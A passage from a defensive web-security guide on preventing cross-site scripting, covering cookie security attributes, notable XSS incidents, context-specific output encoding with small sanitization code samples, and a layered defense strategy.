The takeaway for API-driven applications is that the browser has become the rendering engine and the trust boundary simultaneously. Treat every piece of data returned from an API — including your own internal APIs — as untrusted at the point where it is injected into the DOM, and apply the same encoding and sanitization discipline you would apply to data from an external user.
Cookie Security as an XSS Safety Net
Even when XSS mitigation controls are working correctly, defense-in-depth requires reducing the impact of a hypothetical successful attack. Session cookie theft is the most common goal of XSS exploitation, so configuring cookie security attributes properly can dramatically limit what an attacker can do even if they find a way to run JavaScript in the victim’s browser.
The HttpOnly flag instructs the browser not to expose the cookie to JavaScript at all. Any cookie set with HttpOnly will be sent automatically with HTTP requests but will not appear in document.cookie and cannot be accessed via any JavaScript API. For session tokens, there is almost never a legitimate reason to access them from JavaScript, so HttpOnly should be enabled on every session cookie without exception. A successful XSS payload that reads document.cookie to steal the session token will simply find that token missing from the returned string.
Setting cookies with HttpOnly does not make XSS exploitation impossible — a sophisticated attacker can still use JavaScript to make authenticated API requests on behalf of the victim, modify page content, capture keystrokes, redirect the user, or exfiltrate other sensitive data visible in the DOM. But it does eliminate the single most common and automated form of exploitation (session hijacking) and forces attackers to use more targeted, complex payloads that are less likely to succeed at scale.
The Secure flag ensures the cookie is only transmitted over HTTPS, which prevents it from being intercepted over an unencrypted connection. Combined with HttpOnly, this is the baseline security posture for all session cookies. Most modern web frameworks set these flags by default in their production session configurations; make sure your staging and development environments are not silently overriding them.
The SameSite attribute controls whether cookies are sent with cross-site requests. Setting SameSite=Strict means the cookie is only sent when the request originates from the same site as the one that set the cookie, which provides significant protection against cross-site request forgery (CSRF). SameSite=Lax (the default in modern browsers) allows cookies to be sent with top-level navigation GET requests but blocks them in cross-site sub-resource requests. SameSite=None must be paired with Secure and is used only for cookies that legitimately need to be sent in cross-site contexts, such as third-party embedded widgets.
Cookie prefixes provide an additional layer of protection. A cookie named __Host-session will be rejected by the browser unless it was set with the Secure flag, without a Domain attribute, and with a Path=/ attribute. This prevents subdomain attacks where a compromised subdomain might otherwise be able to set cookies for the parent domain. The __Secure- prefix requires only the Secure flag; __Host- is the stronger variant and recommended for session tokens.
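Tying these attributes together, a minimal sketch of composing the Set-Cookie header value (the cookie name and token are illustrative):

```javascript
// Sketch: compose a Set-Cookie header value combining the attributes
// discussed above. Cookie name and token value are illustrative.
function sessionCookieHeader(token) {
  return [
    `__Host-session=${encodeURIComponent(token)}`,
    'Path=/',          // required by the __Host- prefix
    'Secure',          // HTTPS only; also required by __Host-
    'HttpOnly',        // never exposed to document.cookie
    'SameSite=Strict', // not sent on cross-site requests
  ].join('; ');
}
```

Most frameworks expose these as session configuration options rather than a hand-built header; the sketch simply makes explicit what the final header should contain.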
In combination with a well-configured CSP, HttpOnly cookies significantly raise the cost of XSS exploitation. An attacker who cannot steal the session token and cannot load external scripts is left with a much more limited and less reliable set of attack options.
Notable XSS Incidents in the Wild
Understanding the real-world impact of XSS vulnerabilities is a powerful motivator for prioritizing their prevention. Several high-profile incidents in the history of web security illustrate just how destructive a single XSS flaw can be when it affects a widely used platform.
The Samy Worm from 2005 remains the most famous XSS incident in history. A young developer named Samy Kamkar found a stored XSS vulnerability on MySpace and wrote a self-propagating worm that added him as a friend on every profile that viewed its carrier page, while simultaneously copying itself to that profile’s page. Within approximately twenty hours of release, the worm had infected over one million MySpace profiles. MySpace was forced to take the entire site offline to contain it. The worm itself was relatively benign — Samy’s payload just displayed “but most of all, samy is my hero” on every infected page — but it demonstrated definitively that stored XSS could scale to mass impact without any additional user interaction beyond a single page view.
The British Airways data breach of 2018 resulted in approximately 500,000 customers having their personal and payment card details stolen. Investigators later attributed the attack to the Magecart group, who planted a malicious script in the airline’s booking page that captured form data and transmitted it to an attacker-controlled server. While the initial access vector differed from classic XSS, the attack demonstrated the “formjacking” technique — injecting JavaScript into a trusted site to intercept sensitive data as it is typed — which is conceptually identical to what a stored XSS payload can accomplish. The ICO initially announced its intention to fine British Airways £183 million under GDPR; the final penalty was reduced to £20 million.
The eBay XSS vulnerability reported by security researcher MLT in 2014 allowed attackers to inject HTML and JavaScript into active listings. Crafted eBay listings distributing malware-laden code were observed in the wild before the vulnerability was patched. Because eBay is a transactional platform with strong user trust, a visitor viewing a compromised listing had no reason to suspect that simply browsing the page could expose them to browser-based attacks.
The Twitter StalkDaily worm in 2009 spread through a stored XSS vulnerability in the Twitter web client’s profile pages. Affected users who visited a malicious profile page would have their own Twitter accounts configured to automatically tweet messages promoting the StalkDaily website, causing the payload to propagate to each of their followers. The worm went viral across Twitter’s user base within hours.
These incidents share a common thread: all of them exploited code running in a trusted context — a social network, an airline booking page, an e-commerce site — to take actions or extract data that users would never have consciously authorized. The attacker’s code ran with the full privileges of the legitimate application because the browser cannot distinguish between author-supplied scripts and injected ones once they are both present in the same page. This is the fundamental reason why preventing script injection at the source is so important, and why no combination of runtime monitoring or incident response can fully substitute for code-level XSS prevention.
Output Encoding by Context: A Comprehensive Reference
One of the most frequently misunderstood aspects of XSS prevention is that different rendering contexts require different encoding strategies. Applying the wrong encoding for a context can either fail to prevent XSS or break the functionality of the feature being built. Understanding each context and its corresponding encoding requirement is essential for building XSS-free applications.
HTML body context is the most common context. When a variable is placed between HTML tags — inside a <div>, <p>, <span>, or similar — HTML entity encoding is the correct defense. The characters &, <, >, ", and ' must be converted to their entity equivalents (&amp;, &lt;, &gt;, &quot;, and &#x27; respectively). With entity encoding applied, any injected HTML tags appear as visible text rather than parsed markup.
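A minimal entity encoder for this context looks like the following sketch (in production, prefer your framework’s built-in escaping rather than rolling your own):

```javascript
// Minimal HTML entity encoder for the HTML body context. Ampersand must be
// replaced first so the later entities are not double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}
```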
HTML attribute context occurs when a variable is placed as the value of an HTML attribute. The same HTML entity encoding applies, but quoting is critically important. An attribute value that is fully enclosed in double or single quotes prevents an attacker from closing the attribute and injecting event handlers or new attributes. An unquoted attribute value is exploitable with just a space followed by an event handler name, regardless of encoding. Always quote attribute values and encode entity-significant characters within them.
JavaScript context — where a variable is embedded inside a <script> block — is significantly more complex. HTML entity encoding does not disarm JavaScript; an HTML entity inside a script block will be decoded by the HTML parser before the JavaScript parser processes it. JavaScript encoding using Unicode escapes (\uXXXX) is required for characters that could break out of the JavaScript string literal. The safest approach is to avoid embedding untrusted data directly in JavaScript, and instead pass it through a JSON API call or a data attribute that the JavaScript reads at runtime.
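When data must be serialized into a script block, one common pattern is to JSON-encode it and then Unicode-escape the characters that could terminate the script element. A hedged sketch (the function name is illustrative):

```javascript
// Sketch: serialize server data for embedding in a <script> block. Escaping
// < and > prevents a "</script>" inside a string from closing the element;
// U+2028/U+2029 are escaped as a precaution for older JS parsers.
function toScriptSafeJson(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
```

Because \u escapes are valid JSON, the value round-trips through JSON.parse unchanged on the client.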
URL context arises when a variable is placed inside a URL — in an href, src, action, or formaction attribute, or when constructing a URL for use in JavaScript. Percent encoding (using encodeURIComponent in JavaScript or urlencode in PHP and Python) is the appropriate mechanism for URL query string values. It is critical to encode only the parameter value, not the entire URL, and to validate that the protocol of the complete URL is http: or https: before use, since javascript: and data: URLs can lead to script execution.
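Both halves of that rule — encode only the value, and allowlist the protocol — can be sketched in a few lines (the URLs and fallback are illustrative):

```javascript
// Sketch: encode only the query parameter value, not the whole URL.
function buildSearchUrl(query) {
  return '/search?q=' + encodeURIComponent(query);
}

// Sketch: allowlist the protocol of a user-supplied URL before using it
// in an href. Anything unparsable or non-http(s) gets an inert fallback.
function safeHref(userUrl) {
  try {
    const u = new URL(userUrl, 'https://example.com/');
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (e) {
    // unparsable input falls through to the inert fallback
  }
  return '#'; // neutralizes javascript:, data:, vbscript:, etc.
}
```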
CSS context arises when user-controlled values are placed inside CSS style sheets or inline style attributes. This context is easily overlooked but genuinely dangerous: historically, Internet Explorer’s proprietary expression() syntax allowed JavaScript execution from CSS, and there are consistent cross-browser ways to abuse CSS injection for UI redressing and data exfiltration attacks. CSS values should only be placed in property value positions (not selectors or property names), and only after CSS hex encoding of all non-alphanumeric characters.
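CSS hex encoding can be sketched as follows — every non-alphanumeric character becomes a backslash escape terminated by a space, so an untrusted value cannot introduce selectors, braces, or url() calls:

```javascript
// Sketch: CSS-hex-encode all non-alphanumeric characters so an untrusted
// value can only ever appear as an inert property value.
function cssEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\' + ch.codePointAt(0).toString(16) + ' ');
}
```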
Whenever possible, avoid placing untrusted data in CSS, JavaScript, and URL contexts entirely, and restrict it to HTML body and HTML attribute contexts where well-established encoding libraries can handle it predictably. Modern frontend frameworks largely eliminate the risk in HTML body and attribute contexts through automatic escaping, but developers still need to reason carefully about the remaining contexts.
Building a Layered XSS Defense Strategy
Preventing XSS in production systems is not a single control or a checklist item — it is a defense posture that operates at multiple levels simultaneously. Understanding how these layers reinforce each other helps teams allocate effort sensibly and avoid the false confidence that comes from implementing one control while leaving others unaddressed.
The first and most important layer is output encoding and HTML sanitization at the point of rendering. Every variable rendered in a browser context must pass through the appropriate encoding function for its rendering context. Framework auto-escaping handles this automatically for the normal case; developer discipline covers the edge cases where escaping is bypassed or a raw output function is used. This layer prevents the vast majority of XSS vulnerabilities entirely — an attacker cannot inject executable code if every value they control is treated as inert text.
The second layer is input validation at the point of entry. Allowlist validation (defining what is acceptable, rather than what is blocked) reduces the attack surface by rejecting payloads before they reach the application’s data store. This is especially important for structured data: a phone number field should accept only digits and a few punctuation characters; a username should accept only alphanumeric characters and underscores. Rejecting malformed input early reduces the probability that a bypass technique will succeed against the output encoding layer.
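The structured-data examples above can be sketched as simple allowlist validators (the exact formats here are illustrative assumptions, not a standard):

```javascript
// Sketch: allowlist validators define what is acceptable; everything else
// is rejected before it reaches the data store.
const validators = {
  username: (s) => /^[A-Za-z0-9_]{3,32}$/.test(s), // alphanumerics + underscore
  phone: (s) => /^[0-9+\-() ]{7,20}$/.test(s),     // digits + a little punctuation
};
```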
The third layer is Content Security Policy. A well-configured CSP limits the damage if both previous layers fail or if an XSS vulnerability exists that has not yet been discovered. By restricting which scripts can execute and to which origins data can be sent, CSP can prevent credential theft and data exfiltration even in the presence of an active XSS payload. CSP does not eliminate the XSS vulnerability, but it can reduce a critical, exploitable flaw to a medium-severity nuisance.
The fourth layer is cookie security attributes. Setting HttpOnly, Secure, and SameSite=Strict on session cookies means that even a successfully executing XSS payload cannot steal tokens or perform silent cross-site requests with the victim’s full session privileges. This layer narrows the realistic impact of any XSS that does get through.
The fifth layer is developer education and secure code review. Security controls that developers do not understand get turned off, bypassed, or accidentally omitted. Regular security training, automated SAST scanning in the IDE (ESLint plugins like eslint-plugin-no-unsanitized, Semgrep rules), and security-aware code review checklists keep XSS awareness embedded in the daily development workflow rather than relegated to an annual assessment.
The sixth and final layer is runtime detection and incident response. Server-side logging of CSP violation reports, anomalous outbound requests from the browser, and unusual API call patterns can detect an XSS attack in progress and trigger containment steps — revoking sessions, alerting security teams, and temporarily tightening the CSP policy — before the blast radius grows. No defensive posture is complete without a monitoring and response capability.
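As a sketch of the monitoring side of this layer, a report endpoint receiving classic report-uri violation reports (JSON with a top-level csp-report key) might extract the fields worth logging like this — the function name is illustrative:

```javascript
// Sketch: pull the loggable fields out of a CSP violation report sent in
// the classic report-uri JSON shape ({"csp-report": {...}}).
function summarizeCspReport(body) {
  const r = (body && body['csp-report']) || {};
  return {
    page: r['document-uri'],            // page where the violation occurred
    directive: r['violated-directive'], // which policy directive was violated
    blocked: r['blocked-uri'],          // resource the browser refused to load
  };
}
```

A spike of reports with the same blocked URI across many pages is a strong signal of an injected script and a reasonable trigger for the containment steps described above.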
Teams that implement all six layers build applications that are not only harder to exploit but also faster to recover from the rare case where an attacker does find a way through. The goal is not perfection — XSS vulnerabilities will occasionally reach production despite best efforts — but resilience: ensuring that when one control fails, the others limit the impact to something manageable rather than catastrophic.
Conclusion
Cross-Site Scripting is a significant threat to web application security, but it is entirely preventable with the right practices. By validating input, encoding output, and leveraging tools like CSP and sanitization libraries, developers can eliminate XSS vulnerabilities and protect their users.
Proactively testing for XSS during development and deployment ensures your applications remain secure against evolving threats. Secure your applications today and build trust with users by prioritizing robust security practices.